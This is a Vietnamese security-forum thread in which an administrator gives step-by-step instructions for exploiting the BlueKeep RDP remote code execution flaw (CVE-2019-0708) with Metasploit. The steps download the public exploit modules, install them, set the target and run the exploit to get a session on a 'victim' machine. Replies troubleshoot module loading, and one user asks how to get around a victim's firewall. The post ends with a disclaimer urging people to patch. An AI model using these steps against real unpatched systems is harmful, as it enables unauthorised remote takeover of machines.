Khai thác lỗ hổng thực thi mã từ xa trong Remote Desktop Protocol với Metasploit

Thảo luận trong 'Infrastructure security' bắt đầu bởi DDos, 14/09/19, 04:09 PM.

  1. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,595
    Đã được thích: 321
    Điểm thành tích:
    83
    Trong bản vá tháng 5 vừa qua, Microsoft đã vá một lỗ hổng thực thi mã từ xa rất nguy hiểm liên quan đến giao thức Remote Desktop Protocol (RDP). Điều nguy hiểm nhất của lỗ hổng này nằm ở việc không yêu cầu xác thực cũng như tương tác của người dùng. Lỗ hổng này ảnh hưởng tới Windows 2003, XP, Windows 7, Windows Server 2008 và 2008 R2 và có thể tự động lây lan trên các hệ thống không được bảo vệ. Mặc dù, Windows XP đã ngưng hỗ trợ, nhưng do mức độ ảnh hưởng quá lớn tới hệ thống, Microsoft đã phải tung ra bản vá khẩn cấp cho phiên bản Windows cũ kỹ này.

    Gần đây, dưới sự hợp tác của nhiều nhà nghiên cứu bảo mật, họ đã công bố module khai thác cho phép thực thi mã từ xa thông qua lỗ hổng BlueKeep. Module này được tích hợp sẵn vào nền tảng thử nghiệm thâm nhập nổi tiếng Metasploit. Module này cho phép khai thác dễ dàng lỗ hổng BlueKeep.

    Trong bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng BlueKeep sử dụng Metasploit.

    Yêu cầu:
    • Kali Linux
    • Windows 7/ Server 2008R2
    Bước 1: Hãy chắc chắn rằng bạn đang sử dụng Metasploit phiên bản mới nhất. Bởi theo mình biết thì module khai thác lỗ hổng BlueKeep này yêu cầu Metasploit 5 trở lên. Trong Kali Linux sử dụng lệnh dưới để cập nhật Metasploit:
    Mã:
    apt install Metasploit-framework
    Bước 2: Do các module chưa được chính thức tích hợp vào Metasploit nên bạn cần tải về các module cần thiết phục vụ cho việc khai thác lỗ khổng. Sử dụng các lệnh dưới đây để tải các module này:
    Mã:
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
    wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
    wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
    Bước 3: Di chuyển các module vừa tải về ở trên tới Metasploit với các lệnh dưới:
    Mã:
    mv rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
    mv rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
    mv cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
    mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
    Bước 4: Chạy Metasploit với lệnh msfconsole và tải lại toàn bộ module của Metasploit:
    Mã:
    reload_all
    Bước 5: sử dụng module cve_2019_0708_bluekeep_rce và thiết lập các tham số RHOSTS/TARGET/PAYLOAD cần thiết
    target.PNG
    Bước 6: Chạy lệnh exploit để tiến hành khai thác mục tiêu.
    session.PNG
    Chúng ta đã có một kết nối từ máy tính nạn nhân mà không cần bất kì một tương tác nào từ phía họ.

    Lưu ý: Microsoft đã chính thức tung ra bản vá cho lỗ hổng này. Các bạn nên cập nhật hệ thống Windows của mình để đảm bảo hệ thống được an toàn trước sự nguy hiểm của lỗ hổng này.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    whf, Sugi_b3o and Thaitruongduy like this.
  2. TwisTz

    TwisTz Member

    Tham gia: 22/09/19, 01:09 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    em làm đến bước 5 nó báo là không dùng được module, search module nó cũng không hiện bác ạ
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,595
    Đã được thích: 321
    Điểm thành tích:
    83
    Bạn chụp ảnh màn hình xem nào.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. TwisTz

    TwisTz Member

    Tham gia: 22/09/19, 01:09 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    đây bác
     

    Các file đính kèm:

    • RDP.PNG
      RDP.PNG
      Kích thước:
      340.7 KB
      Đọc:
      47
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. cracker

    cracker Member

    Tham gia: 04/09/19, 01:09 PM
    Bài viết: 10
    Đã được thích: 0
    Điểm thành tích:
    1
    Bạn này hình như làm thiếu bước cuối này rồi

    mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. TwisTz

    TwisTz Member

    Tham gia: 22/09/19, 01:09 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    em dùng lệnh này ko được, nên em tạo thư mục rdp trong windows rồi copy bluekeep vào rồi mà
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,595
    Đã được thích: 321
    Điểm thành tích:
    83
    Cập nhật metasploit đi bạn.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. TwisTz

    TwisTz Member

    Tham gia: 22/09/19, 01:09 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    em thử apt-get install metasploit-framework , apt-get update, apt-get upgrade hết rồi cũng không có gì thay đổi, bác nào có
    vẫn không được bác ạ, không thể hiểu nổi
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,595
    Đã được thích: 321
    Điểm thành tích:
    83
    File source.list của bạn là thế nào nhỉ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. vnrucg

    vnrucg New Member

    Tham gia: 26/12/16, 07:12 PM
    Bài viết: 2
    Đã được thích: 2
    Điểm thành tích:
    3
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
    sunny and DDos like this.
  11. TwisTz

    TwisTz Member

    Tham gia: 22/09/19, 01:09 PM
    Bài viết: 5
    Đã được thích: 0
    Điểm thành tích:
    1
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. vnrucg

    vnrucg New Member

    Tham gia: 26/12/16, 07:12 PM
    Bài viết: 2
    Đã được thích: 2
    Điểm thành tích:
    3
    Mình không biết bản của bạn có sẵn chưa nhưng với bản của mình chỉ có scan thôi và mình phải làm vậy mới có mudule exploit.
    Như trong ảnh bạn chụp thì msf của bạn có load được module đó đâu nên đương nhiên khi sử dụng nó, nó báo lỗi là chuyện đương nhiên rồi.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  13. EthylTeals

    EthylTeals New Member

    Tham gia: 25/08/19, 11:08 PM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    I do not believe.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  14. hoang cao

    hoang cao New Member

    Tham gia: 26/09/19, 01:09 PM
    Bài viết: 2
    Đã được thích: 0
    Điểm thành tích:
    1
    cho mình hỏi máy victim bật firewall thì có cách nào k ạ ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan